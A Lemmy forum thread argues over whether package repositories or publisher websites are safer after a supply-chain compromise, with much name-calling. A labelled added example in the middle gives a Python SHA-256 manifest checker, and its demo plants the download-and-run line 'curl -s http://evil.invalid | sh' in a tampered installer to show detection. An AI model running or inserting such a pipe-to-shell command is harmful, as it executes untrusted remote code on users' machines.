theunknownmuncher@lemmy.world
on 11 Apr 08:10
Linux package repositories win again. Downloading random executable files from sketchy websites will always be stupid
EDIT: laughing so hard at the cope from Windows users, stay fully in denial and enjoy your self-installed viruses
Oh sweet summer child…
Nah. Nothing is perfect of course, but normalizing executing software sourced from random, untrustworthy websites will always be objectively worse than curated repos.
It is hardly a random untrustworthy site, it is the software publisher's site. There is no reason that a package repo can't suffer a similar attack.
Your confidence is entirely misplaced.
Oh I guess I should totally put my confidence in random sketchy websites. Great point!
It literally doesn't matter if it's a publisher site or not, users can't tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.
Go on then, explain to me how the well known software publisher's website is random and sketchy.
I feel like you've demonstrated very effectively how users lack the skills to understand what they are reading online
It isn't a random, sketchy or inherently untrustworthy site.
You shouldn't have any issue explaining how you would go about verifying that a software repo is trustworthy and how that differs from verifying a website.
Unless you don't actually know what you're talking about…
I'll just paste what I already wrote in hopes that your reading comprehension benefits from reading it a second time:
It literally doesn't matter if it's a publisher site or not, users can't tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.
Again, louder this time, PACKAGE REPOSITORIES WILL ALWAYS BE OBJECTIVELY BETTER THAN RANDOM, UNTRUSTWORTHY WEBSITES.
Enjoy your ignorance and viruses
It doesn't matter if the software is delivered via a publisher's website or via a package repository if the supply chain has been compromised.
Clearly you're not aware of any recent cyber security news or you'd know that the NPM package manager has suffered numerous attacks: bleepingcomputer.com/…/shai-hulud-malware-infects…
I guess you should trust NPM though because it's a package manager!
You're just encouraging people to blindly use and trust repos with no understanding of the pros or cons, and without understanding how you can verify and test software yourself to reduce risk. This is especially an easy conversation when we talk closed source vs open source and you failed to even bring that up.
Repeating nonsense claims instead of actually considering the entirely reasonable question only highlights that you're victim to the Dunning-Kruger effect.
You could have had a conversation and learned something from an actual cyber security professional and instead you've acted like a clown.
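The verification step the comment above says users should understand, as an added example that is not part of the thread and not code from any project named in it: a Python checker that parses a sha256sum-style manifest and compares each downloaded artifact against its pinned digest. It assumes the expected digests were obtained out of band (through a different channel than the download itself); the file names, digests and the tampered installer in the demo are constructed.

```python
"""Verify downloaded artifacts against a SHA256SUMS-style manifest.

Added example, not code from the thread or from any project it names.
Assumption: the manifest's digests were obtained out of band. A manifest
served from the same compromised host as the binary proves nothing.
"""
import hashlib
import hmac
import os
import tempfile


def parse_sha256sums(text):
    """Parse `sha256sum` output lines: '<64 hex>  <filename>' (one or two
    spaces; a '*' before the name marks binary mode). Returns
    {filename: lowercase hex digest}. Malformed lines raise instead of being
    skipped, so a mangled manifest cannot silently drop an entry."""
    manifest = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected '<digest> <file>'")
        digest, name = parts
        name = name.lstrip("*")  # sha256sum binary-mode marker
        if len(digest) != 64 or any(c not in "0123456789abcdefABCDEF" for c in digest):
            raise ValueError(f"line {lineno}: bad SHA-256 digest for {name!r}")
        manifest[name] = digest.lower()
    return manifest


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large installers are not read whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifacts(manifest, directory):
    """Return {filename: 'ok' | 'mismatch' | 'missing'}. Every manifest entry
    is reported, so a file that never arrived is not mistaken for a pass."""
    results = {}
    for name, expected in manifest.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
            continue
        actual = sha256_of_file(path)
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "mismatch"
    return results


def demo():
    """Constructed scenario (not real files): an installer whose digest is
    pinned, a copy altered after the digest was published, and an entry the
    manifest lists but that was never downloaded."""
    with tempfile.TemporaryDirectory() as d:
        good = b"#!/bin/sh\necho 'installer v1.2.3'\n"
        with open(os.path.join(d, "installer.sh"), "wb") as f:
            f.write(good)
        with open(os.path.join(d, "installer-tampered.sh"), "wb") as f:
            f.write(good + b"curl -s http://evil.invalid | sh\n")
        pinned = hashlib.sha256(good).hexdigest()  # the out-of-band value
        manifest_text = (
            f"{pinned}  installer.sh\n"
            f"{pinned} *installer-tampered.sh\n"
            f"{pinned}  installer-never-downloaded.sh\n"
        )
        return verify_artifacts(parse_sha256sums(manifest_text), d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9} {name}")
```

The check itself is identical whether the artifact came from a package mirror or a publisher's download page; what differs between the two is how the expected digest reaches you, not how it is compared. If the manifest travels with the binary over the same channel, an attacker who replaced one can replace the other, which is why a signature over the manifest, checked against a key obtained separately, is the part that closes the gap.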
ItS nOt PeRfEcT sO iT cAnT bE bEtTeR
Cope.
hehehe seethe about it clown
You're so close to understanding. All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or do not apply to repos at all.
Please quote me where I claimed that software repositories are less vulnerable to supply chain attacks.
You were wrong about something, constructed a strawman argument, and are grasping at straws to save face.
rAnDoM wEbSiTeS
That's what I thought.
Are you done speed-running through as many logical fallacies as possible? Multiple strawman arguments, no true Scotsman/appeal to authority, name calling/ad hominem. You wouldn't have to resort to these if you were just correct, like me.
Since you don't understand, you lowered the level of the conversation and now I'm going to continue on that level because you get what you deserve.
Ad hominem is a problem now when you started accusing me of lacking reading comprehension aka stupidity and then ignorance - in a field I am a professional in and have given reasoned and valid advice on.
In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo aren't malicious.
Given a real-world example you simply ignore it, "but search results", eat shit you moron. The legitimate website was popped so "rAnDoM wEbSiTeS" aren't a factor or relevant.
JuSt TrUsT iT bRo - nonsense uttered by an absolute fuckwit
Addressing logical fallacies elevates the discussion to a place where it can actually be productive, not lowers it.
It's not relevant because it applies to both random websites and code repositories equally. Again, please quote me where I claimed that code repositories are not susceptible to this.
You've demonstrated both of these, so it is just a statement of fact. "you moron" this you?
Ironic, youâre the only one who has said those words. Another strawman. At no point have I supported just trusting anything.
get ratioed fuckwit
Doesn't change that this ^ is a fact you can't refute, so I'm correct. Your entire argument is strawman arguing against claims that I've never made and name calling. You're basically just arguing with yourself. 🤷
You can't tell after getting completely obliterated by downvotes and repeatedly rebutted that you're the one in the weeds? Clueless much
And yet my point was never refuted
[image: https://lemmy.dbzer0.com/pictrs/image/7b834045-7eac-4d01-9dc6-e0e20613ef97.webp]
Not you, but some advice(?).
Tell me you didn't read the article without saying you didn't read the article.
XZ would like to have a word
I'm glad I keep an archive of everything I download.
Deja Vu
Notepad++ has been there too
Then you realize very popular software and its official website are actually a one-man show. Nobody is perfect, and those things tend to work for years without security in mind. At the time they were built, supply chain attacks had not been invented yet.
I don't have evidence, but I'm still gonna press X to doubt this claim.